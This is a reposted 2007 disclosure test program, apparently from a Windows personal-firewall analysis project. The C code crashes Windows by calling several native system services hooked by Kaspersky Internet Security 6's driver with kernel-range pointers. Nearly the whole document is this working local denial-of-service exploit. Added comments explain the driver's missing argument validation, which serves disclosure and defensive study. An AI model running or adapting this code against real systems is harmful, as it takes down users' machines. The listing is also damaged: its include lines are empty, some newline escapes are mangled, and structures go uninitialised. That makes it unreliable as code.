Vuln: Kaspersky Internet Security 6 SSDT Hooks Multiple Local Vulnerabilities

原创 2007年09月28日 17:00:00
/*

Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00000P006KA)


Usage:
prog FUNCNAME
FUNCNAME - name of function to be checked

Description:
This program calls the given function with invalid parameters that crash the system. The crash happens
because the firewall's driver, which hooks these SSDT functions, does not sufficiently validate the
arguments passed to them.

Test:
Running the testing program with the name of a function from the list of affected functions.

*/

#undef __STRICT_ANSI__
#include
#include
#include
#include
#include

/*
 * Function-pointer type used for ZwCreateProcessEx. main() does not link
 * against this routine; it looks the address up in ntdll.dll at run time
 * with GetProcAddress and calls it through a pointer of this type.
 */
typedef NTSTATUS NTAPI (*ZW_CREATE_PROCESS_EX)(
    OUT PHANDLE ProcessHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN HANDLE InheritFromProcessHandle,
    IN BOOLEAN InheritHandles,
    IN HANDLE SectionHandle OPTIONAL,
    IN HANDLE DebugPort OPTIONAL,
    IN HANDLE ExceptionPort OPTIONAL,
    IN ULONG Unknown);


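/*
 * Print the program banner (advisory title, project name, copyright and
 * project URL) to standard output.
 *
 * The page showed every line ending as "/n", which printf would emit as the
 * two literal characters '/' and 'n'; the newline escape "\n" is restored
 * here so that each banner line ends with a real line break.
 */
void about(void)
{
    printf("Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00000P006KA)\n");
    printf("Windows Personal Firewall analysis project\n");
    printf("Copyright 2007 by Matousec - Transparent security\n");
    printf("http://www.matousec.com/" "\n\n");
}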

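/*
 * Print the command-line usage text to standard output. main() calls this
 * when the program is not given exactly one argument.
 *
 * The page showed the line endings as "/n" (a literal slash and 'n'); the
 * newline escape "\n" is restored so the two usage lines are separated.
 */
void usage(void)
{
    printf("Usage: test FUNCNAME\n"
           " FUNCNAME - name of function to be checked\n");
}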

/*
 * Entry point of the test program.
 *
 * Prints the banner, requires exactly one argument (otherwise prints the
 * usage text and returns 1) and compares that argument, ignoring case, with
 * the Nt and Zw spellings of each service name it knows. The matching branch
 * calls the native service in a loop in which one caller-supplied pointer
 * (or, for the symbolic link case, a pointer stored inside a structure) is
 * 0x80000000+i. On 32-bit Windows with the default 2 GB user/kernel split
 * that range is kernel address space, so it is never a valid user-mode
 * pointer.
 *
 * According to the header comment of this file, the firewall driver's hook
 * on these services does not validate such arguments and the system crashes.
 * What a defender should take from this: a driver that intercepts a system
 * service receives untrusted user-mode pointers and has to probe and capture
 * them (ProbeForRead / ProbeForWrite inside a structured exception handler)
 * before dereferencing them, exactly as the kernel's own implementation of
 * the service is expected to.
 *
 * Returns 1 on every path. "TEST FAILED!" is printed whenever control
 * reaches the end of main, i.e. when the machine kept running; presumably
 * this is the outcome on a build that is not affected.
 *
 * NOTE(review): the "/n" sequences in the printf strings below look like
 * "\n" mangled by the page this listing was copied from - confirm against
 * the original advisory.
 * NOTE(review): every loop is written as "i>=0; i++" and so ends only when
 * the int overflows; signed overflow is undefined behaviour in C.
 * NOTE(review): several structures passed by address (oa, clid, us, oa2)
 * are never initialised before the call.
 */
int main(int argc,char **argv)
{
about();

/* Exactly one argument, the service name, is accepted. */
if (argc!=2)
{
usage();
return 1;
}

/* Third argument (the object attributes pointer) is the out-of-range one. */
if (!stricmp(argv[1],"NtCreateKey") || !stricmp(argv[1],"ZwCreateKey"))
{
HANDLE handle;

for (int i=0;i>=0;i++)
ZwCreateKey(&handle,KEY_ALL_ACCESS,(PVOID)(0x80000000+i),0,NULL,0,NULL);

/* First argument (the output handle pointer) is the out-of-range one. */
} else if (!stricmp(argv[1],"NtCreateProcess") || !stricmp(argv[1],"ZwCreateProcess"))
{
OBJECT_ATTRIBUTES oa;
for (int i=0;i>=0;i++)
ZwCreateProcess((PHANDLE)(i+0x80000000),PROCESS_ALL_ACCESS,&oa,NULL,FALSE,NULL,NULL,NULL);
} else if (!stricmp(argv[1],"NtCreateProcessEx") || !stricmp(argv[1],"ZwCreateProcessEx"))
{
/* Resolved from ntdll.dll at run time; the branch does nothing if the lookup fails. */
ZW_CREATE_PROCESS_EX ZwCreateProcessEx=(ZW_CREATE_PROCESS_EX)GetProcAddress(GetModuleHandle("ntdll.dll"),"ZwCreateProcessEx");
if (ZwCreateProcessEx)
{
OBJECT_ATTRIBUTES oa;
/* Same pattern as ZwCreateProcess: the ProcessHandle output pointer is out of range. */
for (int i=0;i>=0;i++)
ZwCreateProcessEx((PHANDLE)(i+0x80000000),PROCESS_ALL_ACCESS,&oa,NULL,FALSE,NULL,NULL,NULL,0);
}
/* Third argument (the object attributes pointer) is the out-of-range one. */
} else if (!stricmp(argv[1],"NtCreateSection") || !stricmp(argv[1],"ZwCreateSection"))
{
HANDLE handle;
for (int i=0;i>=0;i++)
{
POBJECT_ATTRIBUTES oa=(PVOID)(i+0x80000000);
ZwCreateSection(&handle,0,oa,NULL,0,0,NULL);
}
} else if (!stricmp(argv[1],"NtCreateSymbolicLinkObject") || !stricmp(argv[1],"ZwCreateSymbolicLinkObject"))
{
HANDLE handle;
OBJECT_ATTRIBUTES oa;
for (int i=0;i>=0;i++)
{
/* The structures themselves are valid here; only the string buffer inside
   the UNICODE_STRING is out of range, so checking the outer pointer alone
   is not enough - embedded pointers need the same validation. */
UNICODE_STRING us={0x1000,0x1000,(PWSTR)(i+0x80000000)};
InitializeObjectAttributes(&oa,&us,0,NULL,NULL);
ZwCreateSymbolicLinkObject(&handle,SYMBOLIC_LINK_ALL_ACCESS,&oa,&us);
}
} else if (!stricmp(argv[1],"NtCreateThread") || !stricmp(argv[1],"ZwCreateThread"))
{
HANDLE handle;
CLIENT_ID clid;
OBJECT_ATTRIBUTES oa;
USER_STACK us;
/* The process handle is the loop counter and the context pointer is out of range. */
for (int i=0;i>=0;i++)
ZwCreateThread(&handle,THREAD_ALL_ACCESS,&oa,(HANDLE)i,&clid,(PCONTEXT)(i+0x80000000),&us,FALSE);
} else if (!stricmp(argv[1],"NtLoadKey2") || !stricmp(argv[1],"ZwLoadKey2"))
{
OBJECT_ATTRIBUTES oa2;

/* First object attributes pointer is out of range; the second (oa2) is a
   local that is passed uninitialised. */
for (int i=0;i>=0;i++)
{
POBJECT_ATTRIBUTES oa=(PVOID)(i+0x80000000);
ZwLoadKey2(oa,&oa2,REG_NO_LAZY_FLUSH);
}
/* Third argument (the object attributes pointer) is the out-of-range one. */
} else if (!stricmp(argv[1],"NtOpenKey") || !stricmp(argv[1],"ZwOpenKey"))
{
HANDLE handle;
for (int i=0;i>=0;i++)
{
POBJECT_ATTRIBUTES oa=(PVOID)(i+0x80000000);
ZwOpenKey(&handle,KEY_ALL_ACCESS,oa);
}
} else if (!stricmp(argv[1],"NtOpenProcess") || !stricmp(argv[1],"ZwOpenProcess"))
{
HANDLE handle;
OBJECT_ATTRIBUTES oa;
/* Object attributes are initialised once, with a name whose buffer is NULL. */
UNICODE_STRING us={0x1000,0x1000,NULL};
InitializeObjectAttributes(&oa,&us,0,NULL,NULL);
/* Fourth argument (the client id pointer) is the out-of-range one. */
for (int i=0;i>=0;i++)
{
PCLIENT_ID clid=(PVOID)(i+0x80000000);
ZwOpenProcess(&handle,PROCESS_ALL_ACCESS,&oa,clid);
}
/* Any other name: no test is implemented for it. */
} else printf("/nI do not know how to exploit the vulnerability using this function./n");

/* Reached only if the system is still running after the selected branch. */
printf("/nTEST FAILED!/n");
return 1;
}
 
